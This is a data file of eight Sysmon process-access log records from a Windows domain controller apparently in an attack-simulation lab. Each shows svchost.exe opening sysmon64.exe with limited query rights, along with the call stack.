{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
